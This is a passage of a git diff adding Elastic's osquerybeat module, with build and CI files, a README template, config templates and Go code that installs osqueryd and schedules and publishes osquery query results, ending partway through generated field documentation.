2 + +[Makefile] +indent_style = tab + +[Vagrantfile] +indent_size = 2 +indent_style = space diff --git a/x-pack/osquerybeat/.gitignore b/x-pack/osquerybeat/.gitignore new file mode 100644 index 00000000000..6903d360c78 --- /dev/null +++ b/x-pack/osquerybeat/.gitignore @@ -0,0 +1,11 @@ +/.idea +/build + +.DS_Store +/osquerybeat +/osquerybeat.test +*.pyc + +# Ignore Osquery artifacts that could be created during development +/osqueryd +/osquery/ \ No newline at end of file diff --git a/x-pack/osquerybeat/Jenkinsfile.yml b/x-pack/osquerybeat/Jenkinsfile.yml new file mode 100644 index 00000000000..d3c591e0d7e --- /dev/null +++ b/x-pack/osquerybeat/Jenkinsfile.yml @@ -0,0 +1,67 @@ +when: + branches: true ## for all the branches + changeset: ## when PR contains any of those entries in the changeset + - "^x-pack/osquerybeat/.*" + - "@ci" ## special token regarding the changeset for the ci + - "@xpack" ## special token regarding the changeset for the xpack + comments: ## when PR comment contains any of those entries + - "/test x-pack/osquerybeat" + labels: ## when PR labels matches any of those entries + - "x-pack-osquerybeat" + parameters: ## when parameter was selected in the UI. + - "x-pack-osquerybeat" + tags: true ## for all the tags +platform: "immutable && ubuntu-18" ## default label for all the stages +stages: + Lint: + make: | + make -C x-pack/osquerybeat check; + make -C x-pack/osquerybeat update; + make check-no-changes; + build: + mage: "mage build test" + macos: + mage: "mage build unitTest" + platforms: ## override default label in this specific stage. + - "macosx&&x86_64" + when: ## Override the top-level when. + comments: + - "/test x-pack/osquerybeat for macos" + labels: + - "macOS" + parameters: + - "macosTest" + branches: true ## for all the branches + tags: true ## for all the tags + windows: + mage: "mage build unitTest" + platforms: ## override default labels in this specific stage. + - "windows-2019" + windows-2016: + mage: "mage build unitTest" + platforms: ## override default labels in this specific stage. + - "windows-2016" + windows-2012: + mage: "mage build unitTest" + platforms: ## override default labels in this specific stage. + - "windows-2012-r2" + windows-10: + mage: "mage build unitTest" + platforms: ## override default labels in this specific stage. + - "windows-10" + windows-2008: + mage: "mage build unitTest" + platforms: ## override default labels in this specific stage. + - "windows-2008-r2" + windows-8: + mage: "mage build unitTest" + platforms: ## override default labels in this specific stage. + - "windows-8" + windows-7: + mage: "mage build unitTest" + platforms: ## override default labels in this specific stage. + - "windows-7" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/x-pack/osquerybeat/Makefile b/x-pack/osquerybeat/Makefile new file mode 100644 index 00000000000..be4e2ceaeb3 --- /dev/null +++ b/x-pack/osquerybeat/Makefile @@ -0,0 +1,10 @@ +# +# Variables +# +GOX_FLAGS=-arch="amd64 386 arm ppc64 ppc64le" +ES_BEATS?=../../ + +# +# Includes +# +include $(ES_BEATS)/dev-tools/make/mage.mk diff --git a/x-pack/osquerybeat/NOTICE.txt b/x-pack/osquerybeat/NOTICE.txt new file mode 100644 index 00000000000..e9117eaa81e --- /dev/null +++ b/x-pack/osquerybeat/NOTICE.txt @@ -0,0 +1,5 @@ +osquerybeat +Copyright {year} Elastic + +This product includes software developed by The Apache Software +Foundation (http://www.apache.org/). diff --git a/x-pack/osquerybeat/README.md b/x-pack/osquerybeat/README.md new file mode 100644 index 00000000000..68c68a9aa96 --- /dev/null +++ b/x-pack/osquerybeat/README.md @@ -0,0 +1,116 @@ +# {Beat} + +Welcome to {Beat}. + +Ensure that this folder is at the following location: +`${GOPATH}/src/github.com/elastic/beats/v7/x-pack/osquerybeat` + +## Getting Started with {Beat} + +### Requirements + +* [Golang](https://golang.org/dl/) 1.7 + +### Init Project +To get running with {Beat} and also install the +dependencies, run the following command: + +``` +make update +``` + +It will create a clean git history for each major step. Note that you can always rewrite the history if you wish before pushing your changes. + +To push {Beat} in the git repository, run the following commands: + +``` +git remote set-url origin https://github.com/elastic/beats/v7/x-pack/osquerybeat +git push origin master +``` + +For further development, check out the [beat developer guide](https://www.elastic.co/guide/en/beats/libbeat/current/new-beat.html). + +### Build + +To build the binary for {Beat} run the command below. This will generate a binary +in the same directory with the name osquerybeat. + +``` +make +``` + + +### Run + +To run {Beat} with debugging output enabled, run: + +``` +./osquerybeat -c osquerybeat.yml -e -d "*" +``` + + +### Test + +To test {Beat}, run the following command: + +``` +make testsuite +``` + +alternatively: +``` +make unit-tests +make system-tests +make integration-tests +make coverage-report +``` + +The test coverage is reported in the folder `./build/coverage/` + +### Update + +Each beat has a template for the mapping in elasticsearch and a documentation for the fields +which is automatically generated based on `fields.yml` by running the following command. + +``` +make update +``` + + +### Cleanup + +To clean {Beat} source code, run the following command: + +``` +make fmt +``` + +To clean up the build directory and generated artifacts, run: + +``` +make clean +``` + + +### Clone + +To clone {Beat} from the git repository, run the following commands: + +``` +mkdir -p ${GOPATH}/src/github.com/elastic/osquerybeat +git clone https://github.com/elastic/osquerybeat ${GOPATH}/src/github.com/elastic/osquerybeat +``` + + +For further development, check out the [beat developer guide](https://www.elastic.co/guide/en/beats/libbeat/current/new-beat.html). + + +## Packaging + +The beat frameworks provides tools to crosscompile and package your beat for different platforms. This requires [docker](https://www.docker.com/) and vendoring as described above. To build packages of your beat, run the following command: + +``` +make release +``` + +This will fetch and create all images required for the build process. The whole process to finish can take several minutes. diff --git a/x-pack/osquerybeat/_meta/config/beat.docker.yml.tmpl b/x-pack/osquerybeat/_meta/config/beat.docker.yml.tmpl new file mode 100644 index 00000000000..9b112291b46 --- /dev/null +++ b/x-pack/osquerybeat/_meta/config/beat.docker.yml.tmpl @@ -0,0 +1,18 @@ +################### Osquerybeat Configuration Example ######################### + +############################# Osquerybeat ###################################### + +osquerybeat: +# inputs: +# - type: osquery +# streams: +# - id: "E169F085-AC8B-48AF-9355-D2977030CE24" +# query: "select * from users" +# - id: "CFDE1EAA-0C6C-4D19-9EEC-45802B2A8C01" +# query: "select * from processes" +# interval: 1m + +# ============================== Process Security ============================== +# Disable seccomp system call filtering on Linux. +# Otherwise osquerybeat can't fork osqueryd with error: Failed to start osqueryd process: fork/exec ./osqueryd: operation not permitted +seccomp.enabled: false diff --git a/x-pack/osquerybeat/_meta/config/beat.reference.yml.tmpl b/x-pack/osquerybeat/_meta/config/beat.reference.yml.tmpl new file mode 100644 index 00000000000..9b112291b46 --- /dev/null +++ b/x-pack/osquerybeat/_meta/config/beat.reference.yml.tmpl @@ -0,0 +1,18 @@ +################### Osquerybeat Configuration Example ######################### + +############################# Osquerybeat ###################################### + +osquerybeat: +# inputs: +# - type: osquery +# streams: +# - id: "E169F085-AC8B-48AF-9355-D2977030CE24" +# query: "select * from users" +# - id: "CFDE1EAA-0C6C-4D19-9EEC-45802B2A8C01" +# query: "select * from processes" +# interval: 1m + +# ============================== Process Security ============================== +# Disable seccomp system call filtering on Linux. +# Otherwise osquerybeat can't fork osqueryd with error: Failed to start osqueryd process: fork/exec ./osqueryd: operation not permitted +seccomp.enabled: false diff --git a/x-pack/osquerybeat/_meta/config/beat.yml.tmpl b/x-pack/osquerybeat/_meta/config/beat.yml.tmpl new file mode 100644 index 00000000000..9b112291b46 --- /dev/null +++ b/x-pack/osquerybeat/_meta/config/beat.yml.tmpl @@ -0,0 +1,18 @@ +################### Osquerybeat Configuration Example ######################### + +############################# Osquerybeat ###################################### + +osquerybeat: +# inputs: +# - type: osquery +# streams: +# - id: "E169F085-AC8B-48AF-9355-D2977030CE24" +# query: "select * from users" +# - id: "CFDE1EAA-0C6C-4D19-9EEC-45802B2A8C01" +# query: "select * from processes" +# interval: 1m + +# ============================== Process Security ============================== +# Disable seccomp system call filtering on Linux. +# Otherwise osquerybeat can't fork osqueryd with error: Failed to start osqueryd process: fork/exec ./osqueryd: operation not permitted +seccomp.enabled: false diff --git a/x-pack/osquerybeat/_meta/fields.yml b/x-pack/osquerybeat/_meta/fields.yml new file mode 100644 index 00000000000..678896f0f4a --- /dev/null +++ b/x-pack/osquerybeat/_meta/fields.yml @@ -0,0 +1,4 @@ +- key: osquerybeat + title: Osquerybeat + description: + fields: \ No newline at end of file diff --git a/x-pack/osquerybeat/beater/install.go b/x-pack/osquerybeat/beater/install.go new file mode 100644 index 00000000000..cd9df6ba1c9 --- /dev/null +++ b/x-pack/osquerybeat/beater/install.go @@ -0,0 +1,74 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package beater + +import ( + "context" + "os" + "runtime" + + "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/distro" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/fileutil" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/install" +) + +func installOsquery(ctx context.Context, dir string) error { + log := logp.NewLogger("osqueryd_install").With("dir", dir) + log.Info("Check if osqueryd needs to be installed") + + fn := distro.OsquerydDistroFilename() + var installFunc func(context.Context, string, string, bool) error + + if runtime.GOOS == "windows" { + installFunc = install.InstallFromMSI + } else if runtime.GOOS == "darwin" { + installFunc = install.InstallFromPkg + } + + installing := false + ilog := log.With("file", fn) + if installFunc != nil { + exists, err := fileutil.FileExists(fn) + if err != nil { + ilog.Errorf("Failed to access the install package file, error: %v", err) + return err + } + if exists { + ilog.Info("Found install package file, installing") + err = installFunc(ctx, fn, dir, true) + if err != nil { + ilog.Errorf("Failed to extract from install package, error: %v", err) + return err + } + installing = true + } else { + ilog.Info("Install package doesn't exists, nothing to install") + } + } + + if installing { + // Check that osqueryd file is now installed + osqfn := distro.OsquerydFilename() + flog := log.With("file", osqfn) + exists, err := fileutil.FileExists(osqfn) + if err != nil { + flog.Errorf("Failed to access the file, error: %v", err) + return err + } + if exists { + flog.Info("File found") + } else { + flog.Error("File is not found after install") + return os.ErrNotExist + } + + if derr := os.Remove(fn); derr != nil { + ilog.Warn("Failed to delete install package after install") + } + log.Info("Successfully installed osqueryd") + } + return nil +} diff --git a/x-pack/osquerybeat/beater/osquerybeat.go b/x-pack/osquerybeat/beater/osquerybeat.go new file mode 100644 index 00000000000..40398d16bc7 --- /dev/null +++ b/x-pack/osquerybeat/beater/osquerybeat.go @@ -0,0 +1,381 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package beater + +import ( + "context" + "errors" + "fmt" + "os" + "path/filepath" + "sync" + "time" + + "github.com/gofrs/uuid" + + "github.com/elastic/beats/v7/libbeat/beat" + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/libbeat/logp" + + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/config" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/distro" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/osqueryd" +) + +var ( + ErrInvalidQueryConfig = errors.New("invalid query configuration") + ErrAlreadyRunning = errors.New("already running") + ErrQueryExecution = errors.New("failed query execution") + ErrActionRequest = errors.New("invalid action request") +) + +// osquerybeat configuration. +type osquerybeat struct { + b *beat.Beat + config config.Config + client beat.Client + osqCli *osqueryd.Client + + log *logp.Logger + + // Beat lifecycle context, cancelled on Stop + cancel context.CancelFunc + mx sync.Mutex +} + +// New creates an instance of osquerybeat. +func New(b *beat.Beat, cfg *common.Config) (beat.Beater, error) { + log := logp.NewLogger("osquerybeat") + + c := config.DefaultConfig + if err := cfg.Unpack(&c); err != nil { + return nil, fmt.Errorf("Error reading config file: %v", err) + } + + bt := &osquerybeat{ + b: b, + config: c, + log: log, + } + + return bt, nil +} + +func (bt *osquerybeat) initContext() (context.Context, error) { + bt.mx.Lock() + defer bt.mx.Unlock() + if bt.cancel != nil { + return nil, ErrAlreadyRunning + } + var ctx context.Context + ctx, bt.cancel = context.WithCancel(context.Background()) + return ctx, nil +} + +func (bt *osquerybeat) close() { + bt.mx.Lock() + defer bt.mx.Unlock() + if bt.client != nil { + bt.client.Close() + bt.client = nil + } + if bt.cancel != nil { + bt.cancel() + bt.cancel = nil + } +} + +func (bt *osquerybeat) inputTypes() []string { + m := make(map[string]struct{}) + for _, input := range bt.config.Inputs { + m[input.Type] = struct{}{} + } + + res := make([]string, 0, len(m)) + for k := range m { + res = append(res, k) + } + + return res +} + +// Run starts osquerybeat. +func (bt *osquerybeat) Run(b *beat.Beat) error { + ctx, err := bt.initContext() + if err != nil { + return err + } + defer bt.close() + + var wg sync.WaitGroup + + exefp, err := os.Executable() + if err != nil { + return err + } + exedir := filepath.Dir(exefp) + + // Create temp directory for socket and possibly other things + // The unix domain socker path is limited to 108 chars and would + // not always be able to create in subdirectory + tmpdir, removeTmpDir, err := createSockDir(bt.log) + if err != nil { + return err + } + defer func() { + if removeTmpDir != nil { + removeTmpDir() + } + }() + + // Install osqueryd if needed + err = installOsquery(ctx, exedir) + if err != nil { + return err + } + + // Start osqueryd child process + osd := osqueryd.OsqueryD{ + RootDir: exedir, + SocketPath: osqueryd.SocketPath(tmpdir), + } + + // Connect publisher + bt.client, err = b.Publisher.Connect() + if err != nil { + return err + } + + // Start osqueryd child process + osdCtx, osdCn := context.WithCancel(ctx) + defer osdCn() + osqDone, err := osd.Start(osdCtx) + if err != nil { + bt.log.Errorf("Failed to start osqueryd process: %v", err) + return err + } + + // Connect to osqueryd socket. Replying on the client library retry logic that checks for the socket availability + bt.osqCli, err = osqueryd.NewClient(ctx, osd.SocketPath, osqueryd.DefaultTimeout) + if err != nil { + bt.log.Errorf("Failed to create osqueryd client: %v", err) + return err + } + + // Unlink socket path early + if removeTmpDir != nil { + removeTmpDir() + removeTmpDir = nil + } + + // Watch input configuration updates + inputConfigCh := config.WatchInputs(ctx) + + // Start queries execution scheduler + scheduler := NewScheduler(ctx, bt.query) + wg.Add(1) + go func() { + defer wg.Done() + scheduler.Run() + }() + + // Load initial queries + streams, inputTypes := config.StreamsFromInputs(bt.config.Inputs) + sz := len(streams) + if sz > 0 { + scheduler.Load(streams) + } + + // Agent actions handlers + var actionHandlers []*actionHandler + unregisterActionHandlers := func() { + // Unregister action handlers + if b.Manager != nil { + for _, ah := range actionHandlers { + b.Manager.UnregisterAction(ah) + ah.bt = nil + } + } + } + + registerActionHandlers := func(itypes []string) { + unregisterActionHandlers() + // Register action handler + if b.Manager != nil { + for _, inType := range itypes { + ah := &actionHandler{ + inputType: inType, + bt: bt, + } + b.Manager.RegisterAction(ah) + } + } + } + + setManagerPayload := func(itypes []string) { + if b.Manager != nil { + b.Manager.SetPayload(map[string]interface{}{ + "osquery_version": distro.OsquerydVersion(), + }) + } + } + +LOOP: + for { + select { + case err = <-osqDone: + break LOOP // Exiting if osquery child process exited with error + case <-ctx.Done(): + bt.log.Info("Wait osqueryd exit") + exitErr := <-osqDone + bt.log.Infof("Exited osqueryd process, error: %v", exitErr) + break LOOP + case inputConfigs := <-inputConfigCh: + streams, inputTypes = config.StreamsFromInputs(inputConfigs) + registerActionHandlers(inputTypes) + setManagerPayload(inputTypes) + scheduler.Load(streams) + } + } + + // Unregister action handlers + unregisterActionHandlers() + + // Wait for clean scheduler exit + wg.Wait() + + return err +} + +// Stop stops osquerybeat. +func (bt *osquerybeat) Stop() { + bt.close() +} + +func (bt *osquerybeat) query(ctx context.Context, q interface{}) error { + cfg, ok := q.(config.StreamConfig) + if !ok { + bt.log.Error("Unexpected query configuration") + return ErrInvalidQueryConfig + } + + // Response ID could be useful in order to differentiate between different runs for the interval queries + responseID := uuid.Must(uuid.NewV4()).String() + + log := bt.log.With("id", cfg.ID).With("query", cfg.Query).With("interval", cfg.Interval) + + reqData := map[string]interface{}{ + "id": cfg.ID, + "query": cfg.Query, + } + + err := bt.executeQuery(ctx, log, cfg.Index, cfg.ID, cfg.Query, responseID, reqData) + if err != nil { + // Preserving the error as is, it will be attached to the result document + return err + } + return nil +} + +func (bt *osquerybeat) executeQuery(ctx context.Context, log *logp.Logger, index, id, query, responseID string, req map[string]interface{}) error { + log.Debugf("Execute query: %s", query) + + start := time.Now() + + hits, err := bt.osqCli.Query(ctx, query) + + if err != nil { + log.Errorf("Failed to execute query, err: %v", err) + return err + } + + log.Infof("Completed query in: %v", time.Since(start)) + + for _, hit := range hits { + reqData := req["data"] + event := beat.Event{ + Timestamp: time.Now(), + Fields: common.MapStr{ + "type": bt.b.Info.Name, + "action_id": id, + "osquery": hit, + }, + } + if reqData != nil { + event.Fields["action_data"] = reqData + } + if responseID != "" { + event.Fields["response_id"] = responseID + } + if index != "" { + event.Meta = common.MapStr{"index": index} + } + + bt.client.Publish(event) + } + log.Infof("The %d events sent to index %s", len(hits), index) + return nil +} + +type actionHandler struct { + inputType string + bt *osquerybeat +} + +func (a *actionHandler) Name() string { + return a.inputType +} + +type actionData struct { + Query string + ID string +} + +func actionDataFromRequest(req map[string]interface{}) (ad actionData, err error) { + if req == nil { + return ad, ErrActionRequest + } + if v, ok := req["id"]; ok { + if id, ok := v.(string); ok { + ad.ID = id + } + } + if v, ok := req["data"]; ok { + if m, ok := v.(map[string]interface{}); ok { + if v, ok := m["query"]; ok { + if query, ok := v.(string); ok { + ad.Query = query + } + } + } + } + return ad, nil +} + +// Execute handles the action request. +func (a *actionHandler) Execute(ctx context.Context, req map[string]interface{}) (map[string]interface{}, error) { + + start := time.Now().UTC() + err := a.execute(ctx, req) + end := time.Now().UTC() + + res := map[string]interface{}{ + "started_at": start.Format(time.RFC3339Nano), + "completed_at": end.Format(time.RFC3339Nano), + } + + if err != nil { + res["error"] = err.Error() + } + return res, nil +} + +func (a *actionHandler) execute(ctx context.Context, req map[string]interface{}) error { + ad, err := actionDataFromRequest(req) + if err != nil { + return fmt.Errorf("%v: %w", err, ErrQueryExecution) + } + return a.bt.executeQuery(ctx, a.bt.log, config.DefaultStreamIndex, ad.ID, ad.Query, "", req) +} diff --git a/x-pack/osquerybeat/beater/runner.go b/x-pack/osquerybeat/beater/runner.go new file mode 100644 index 00000000000..c56f5caa9aa --- /dev/null +++ b/x-pack/osquerybeat/beater/runner.go @@ -0,0 +1,57 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package beater + +import ( + "context" + "sync" + "time" +) + +type runner struct { + cancel context.CancelFunc + wg sync.WaitGroup +} + +func (r *runner) stop() { + r.cancel() + r.wg.Wait() +} + +func startRunner(pctx context.Context, q interface{}, interval time.Duration, query func(context.Context, interface{}) error) *runner { + ctx, cancel := context.WithCancel(pctx) + r := &runner{ + cancel: cancel, + } + + r.wg.Add(1) + go func() { + defer cancel() + defer r.wg.Done() + + // Run query right away + query(ctx, q) + + if interval == 0 { + return + } + + // Schedule with interval + t := time.NewTimer(interval) + defer t.Stop() + + for { + select { + case <-t.C: + query(ctx, q) + t.Reset(interval) + case <-ctx.Done(): + return + } + } + }() + + return r +} diff --git a/x-pack/osquerybeat/beater/scheduler.go b/x-pack/osquerybeat/beater/scheduler.go new file mode 100644 index 00000000000..335555470aa --- /dev/null +++ b/x-pack/osquerybeat/beater/scheduler.go @@ -0,0 +1,119 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package beater + +import ( + "context" + + "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/x-pack/osquerybeat/internal/config" +) + +type QueryFunc func(context.Context, interface{}) error + +// Scheduler executes queries either periodically or once depending on the query configuration +type Scheduler struct { + ctx context.Context + inCh chan []config.StreamConfig + runners map[string]*runner + queryFunc QueryFunc + log *logp.Logger +} + +func NewScheduler(ctx context.Context, queryFunc QueryFunc) *Scheduler { + return &Scheduler{ + ctx: ctx, + inCh: make(chan []config.StreamConfig, 1), + runners: make(map[string]*runner), + queryFunc: queryFunc, + log: logp.NewLogger("scheduler"), + } +} + +func (s *Scheduler) Load(streams []config.StreamConfig) { + select { + case s.inCh <- streams: + case <-s.ctx.Done(): + } +} + +func (s *Scheduler) Run() { +LOOP: + for { + select { + case streams := <-s.inCh: + s.load(streams) + case <-s.ctx.Done(): + s.stopRunners() + s.log.Info("Exiting on context cancel") + break LOOP + } + } +} + +func (s *Scheduler) isCancelled() bool { + return s.ctx.Err() != nil +} + +func (s *Scheduler) stopRunners() { + s.load(nil) +} + +func (s *Scheduler) load(streams []config.StreamConfig) { + var ( + once, repeating []config.StreamConfig + ) + + // Separate fire-once queries and repeating queries + for _, stream := range streams { + if stream.Interval == 0 { + once = append(once, stream) + } else { + repeating = append(repeating, stream) + } + } + + // Cancel and remove the query runners that are not in the streams + var ids []string + for id, r := range s.runners { + found := false + for _, s := range repeating { + if id == s.ID { + found = true + break + } + } + if !found { + r.stop() + ids = append(ids, id) + } + } + + for _, id := range ids { + delete(s.runners, id) + } + + if s.isCancelled() { + return + } + + // Run queries that should be executed only one + for _, q := range once { + if s.isCancelled() { + return + } + startRunner(s.ctx, q, q.Interval, s.queryFunc) + } + + // Schedule interval queries + for _, q := range repeating { + if s.isCancelled() { + return + } + if _, ok := s.runners[q.ID]; !ok { + s.runners[q.ID] = startRunner(s.ctx, q, q.Interval, s.queryFunc) + } + } +} diff --git a/x-pack/osquerybeat/beater/sockdir_unix.go b/x-pack/osquerybeat/beater/sockdir_unix.go new file mode 100644 index 00000000000..eb8d1808b7b --- /dev/null +++ b/x-pack/osquerybeat/beater/sockdir_unix.go @@ -0,0 +1,36 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +// +build !windows + +package beater + +import ( + "io/ioutil" + "os" + "syscall" + + "github.com/elastic/beats/v7/libbeat/logp" +) + +func createSockDir(log *logp.Logger) (string, func(), error) { + // Try to create socket in /var/run first + // This would result in something the directory something like: /var/run/027202467 + tpath, err := ioutil.TempDir("/var/run", "") + if err != nil { + if perr, ok := err.(*os.PathError); ok { + if perr.Err == syscall.EACCES { + log.Warnf("Failed to access the directory %s, running as non-root?", perr.Path) + tpath, err = ioutil.TempDir("", "") + if err != nil { + return "", nil, err + } + } + } + } + + return tpath, func() { + os.RemoveAll(tpath) + }, nil +} diff --git a/x-pack/osquerybeat/beater/sockdir_windows.go b/x-pack/osquerybeat/beater/sockdir_windows.go new file mode 100644 index 00000000000..91115774241 --- /dev/null +++ b/x-pack/osquerybeat/beater/sockdir_windows.go @@ -0,0 +1,15 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +// +build windows + +package beater + +import "github.com/elastic/beats/v7/libbeat/logp" + +func createSockDir(log *logp.Logger) (string, func(), error) { + // Noop on winders + return "", func() { + }, nil +} diff --git a/x-pack/osquerybeat/cmd/root.go b/x-pack/osquerybeat/cmd/root.go new file mode 100644 index 00000000000..adaa112619f --- /dev/null +++ b/x-pack/osquerybeat/cmd/root.go @@ -0,0 +1,29 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package cmd + +import ( + "github.com/elastic/beats/v7/x-pack/osquerybeat/beater" + + cmd "github.com/elastic/beats/v7/libbeat/cmd" + "github.com/elastic/beats/v7/libbeat/cmd/instance" + xpackcmd "github.com/elastic/beats/v7/x-pack/libbeat/cmd" +) + +// Name of this beat +var Name = "osquerybeat" + +var RootCmd = Osquerybeat() + +func Osquerybeat() *cmd.BeatsRootCmd { + settings := instance.Settings{ + Name: Name, + ElasticLicensed: true, + } + command := cmd.GenRootCmdWithSettings(beater.New, settings) + + xpackcmd.AddXPack(command, Name) + return command +} diff --git a/x-pack/osquerybeat/dev-tools/packaging/packages.yml b/x-pack/osquerybeat/dev-tools/packaging/packages.yml new file mode 100644 index 00000000000..710465e9e12 --- /dev/null +++ b/x-pack/osquerybeat/dev-tools/packaging/packages.yml @@ -0,0 +1,89 @@ +--- + +# This file contains the package specifications for Osquerybeat. + +shared: + - &common + name: '{{.BeatName}}' + service_name: '{{.BeatServiceName}}' + os: '{{.GOOS}}' + arch: '{{.PackageArch}}' + vendor: '{{.BeatVendor}}' + version: '{{ beat_version }}' + license: '{{.BeatLicense}}' + url: '{{.BeatURL}}' + description: '{{.BeatDescription}}' + + - &binary_files + '{{.BeatName}}{{.BinaryExt}}': + source: build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} + mode: 0755 + fields.yml: + source: fields.yml + mode: 0644 + LICENSE.txt: + source: '{{ repo.RootDir }}/LICENSE.txt' + mode: 0644 + NOTICE.txt: + source: '{{ repo.RootDir }}/NOTICE.txt' + mode: 0644 + README.md: + template: '{{ elastic_beats_dir }}/dev-tools/packaging/templates/common/README.md.tmpl' + mode: 0644 + .build_hash.txt: + content: > + {{ commit }} + mode: 0644 + '{{.BeatName}}.reference.yml': + source: '{{.BeatName}}.reference.yml' + mode: 0644 + '{{.BeatName}}.yml': + source: '{{.BeatName}}.yml' + mode: 0600 + config: true + + # Binary package spec (tar.gz for linux/darwin) + - &binary_spec + <<: *common + files: + <<: *binary_files + + # + # License modifiers for the Elastic License + # + - &elastic_license_for_binaries + license: "Elastic License" + files: + LICENSE.txt: + source: '{{ repo.RootDir }}/licenses/ELASTIC-LICENSE.txt' + mode: 0644 + +# specs is a list of named packaging "flavors". +specs: + osquerybeat: + ### + # Elastic Licensed Packages + ### + - os: windows + types: [zip] + spec: + <<: *binary_spec + <<: *elastic_license_for_binaries + files: + '{{.BeatName}}{{.BinaryExt}}': + source: build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} + + - os: darwin + types: [tgz] + spec: + <<: *binary_spec + <<: *elastic_license_for_binaries + + - os: linux + types: [tgz] + spec: + <<: *binary_spec + <<: *elastic_license_for_binaries + files: + '{{.BeatName}}{{.BinaryExt}}': + source: build/golang-crossbuild/{{.BeatName}}-{{.GOOS}}-{{.Platform.Arch}}{{.BinaryExt}} diff --git a/x-pack/osquerybeat/docs/fields.asciidoc b/x-pack/osquerybeat/docs/fields.asciidoc new file mode 100644 index 00000000000..1bc25613d7d --- /dev/null +++ b/x-pack/osquerybeat/docs/fields.asciidoc @@ -0,0 +1,9762 @@ + +//// +This file is generated! See _meta/fields.yml and scripts/generate_fields_docs.py +//// + +[[exported-fields]] += Exported fields + +[partintro] + +-- +This document describes the fields that are exported by Osquerybeat. They are +grouped in the following categories: + +* <> +* <> +* <> +* <> +* <> +* <> +* <> +* <> +* <> + +-- +[[exported-fields-beat-common]] +== Beat fields + +Contains common beat fields available in all event types. + + + +*`agent.hostname`*:: ++ +-- +Deprecated - use agent.name or agent.id to identify an agent. + + +type: alias + +alias to: agent.name + +-- + +*`beat.timezone`*:: ++ +-- +type: alias + +alias to: event.timezone + +-- + +*`fields`*:: ++ +-- +Contains user configurable fields. + + +type: object + +-- + +*`beat.name`*:: ++ +-- +type: alias + +alias to: host.name + +-- + +*`beat.hostname`*:: ++ +-- +type: alias + +alias to: agent.name + +-- + +*`timeseries.instance`*:: ++ +-- +Time series instance id + +type: keyword + +-- + +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + +[[exported-fields-cloud]] +== Cloud provider metadata fields + +Metadata from cloud providers added by the add_cloud_metadata processor. + + + +*`cloud.image.id`*:: ++ +-- +Image ID for the cloud instance. + + +example: ami-abcd1234 + +-- + +*`meta.cloud.provider`*:: ++ +-- +type: alias + +alias to: cloud.provider + +-- + +*`meta.cloud.instance_id`*:: ++ +-- +type: alias + +alias to: cloud.instance.id + +-- + +*`meta.cloud.instance_name`*:: ++ +-- +type: alias + +alias to: cloud.instance.name + +-- + +*`meta.cloud.machine_type`*:: ++ +-- +type: alias + +alias to: cloud.machine.type + +-- + +*`meta.cloud.availability_zone`*:: ++ +-- +type: alias + +alias to: cloud.availability_zone + +-- + +*`meta.cloud.project_id`*:: ++ +-- +type: alias + +alias to: cloud.project.id + +-- + +*`meta.cloud.region`*:: ++ +-- +type: alias + +alias to: cloud.region + +-- + +[[exported-fields-docker-processor]] +== Docker fields + +Docker stats collected from Docker. + + + + +*`docker.container.id`*:: ++ +-- +type: alias + +alias to: container.id + +-- + +*`docker.container.image`*:: ++ +-- +type: alias + +alias to: container.image.name + +-- + +*`docker.container.name`*:: ++ +-- +type: alias + +alias to: container.name + +-- + +*`docker.container.labels`*:: ++ +-- +Image labels. + + +type: object + +-- + +[[exported-fields-ecs]] +== ECS fields + + +This section defines Elastic Common Schema (ECS) fields—a common set of fields +to be used when storing event data in {es}. + +This is an exhaustive list, and fields listed here are not necessarily used by {beatname_uc}. +The goal of ECS is to enable and encourage users of {es} to normalize their event data, +so that they can better analyze, visualize, and correlate the data represented in their events. + +See the {ecs-ref}[ECS reference] for more information. + +*`@timestamp`*:: ++ +-- +Date/time when the event originated. +This is the date/time extracted from the event, typically representing when the event was generated by the source. +If the event source has no original timestamp, this value is typically populated by the first time the event was received by the pipeline. +Required field for all events. + +type: date + +example: 2016-05-23T08:05:34.853Z + +required: True + +-- + +*`labels`*:: ++ +-- +Custom key/value pairs. +Can be used to add meta information to events. Should not contain nested objects. All values are stored as keyword. +Example: `docker` and `k8s` labels. + +type: object + +example: {"application": "foo-bar", "env": "production"} + +-- + 